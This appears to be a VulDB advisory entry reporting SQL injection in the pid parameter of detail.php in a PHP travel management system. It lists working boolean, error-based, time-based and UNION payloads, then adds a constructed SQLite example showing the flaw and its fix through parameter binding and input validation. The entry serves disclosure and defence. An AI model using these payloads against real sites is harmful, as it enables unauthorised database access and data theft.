| Title | code-projects Travel Management System Using PHP 1.0 SQL Injection |
|---|
| Description | The pid parameter of detail.php, reachable at /travel/detail.php?pid=, is vulnerable to SQL injection, which allows attackers to inject malicious SQL code into the query. The following values of the pid parameter illustrate each technique:
For boolean-based blind:
pid=1' AND 6822=6822 AND 'jSNM'='jSNM
For error-based:
pid=1' AND (SELECT 9966 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(9966=9966,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iCmS'='iCmS
For time-based blind:
pid=1' AND (SELECT 8620 FROM (SELECT(SLEEP(5)))WSrt) AND 'nOlC'='nOlC
For UNION query:
pid=-5731' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627671,0x6d664767455468646d727a4c7946534256474544714d565850497154764f714378686a42494e5755,0x71626a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Source | https://code-projects.org/travel-management-system-using-php-source-code/ |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 12/24/2024 17:52 (1 Year ago) |
|---|
| Moderation | 12/25/2024 19:11 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289311 [code-projects Travel Management System 1.0 /detail.php pid sql injection] |
|---|
| Points | 20 |
|---|
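
The effect of the boolean-based value above, and the fix for it, as an added example that is not code from the submission or from the affected project. It assumes the flawed query pastes pid into a quoted literal; the `package` table, its rows and all function names are constructed, and SQLite stands in for the application's database so the block runs offline.

```python
import sqlite3

# Two of the pid values quoted in the submission above.
BOOLEAN_PAYLOAD = "1' AND 6822=6822 AND 'jSNM'='jSNM"
TIME_PAYLOAD = "1' AND (SELECT 8620 FROM (SELECT(SLEEP(5)))WSrt) AND 'nOlC'='nOlC"


def make_db():
    """Constructed stand-in data; the application's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE package (pid INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO package VALUES (?, ?)",
                   [(1, "Beach week"), (2, "City break")])
    return db


def lookup_concatenated(db, pid):
    """Assumed shape of the flaw: pid pasted into a quoted SQL literal."""
    sql = "SELECT name FROM package WHERE pid = '" + pid + "'"
    return [row[0] for row in db.execute(sql)]


def parse_pid(raw):
    """Accept only a short run of ASCII digits, as a package id should be."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("pid must be a decimal integer")
    return int(raw)


def lookup_bound(db, pid):
    """Hardened form: the value is bound, so it is never parsed as SQL."""
    return [row[0] for row in
            db.execute("SELECT name FROM package WHERE pid = ?", (pid,))]


def is_rejected(raw):
    """True when parse_pid refuses the value."""
    try:
        parse_pid(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(lookup_concatenated(db, BOOLEAN_PAYLOAD))  # quote closes the literal
    print(lookup_bound(db, BOOLEAN_PAYLOAD))         # compared as plain data
    print(lookup_bound(db, parse_pid("1")), is_rejected(TIME_PAYLOAD))
```

In the concatenated form the quote inside pid ends the literal and the rest is evaluated as SQL; with a bound parameter the same string is only compared as data, and `parse_pid` rejects it before any query runs.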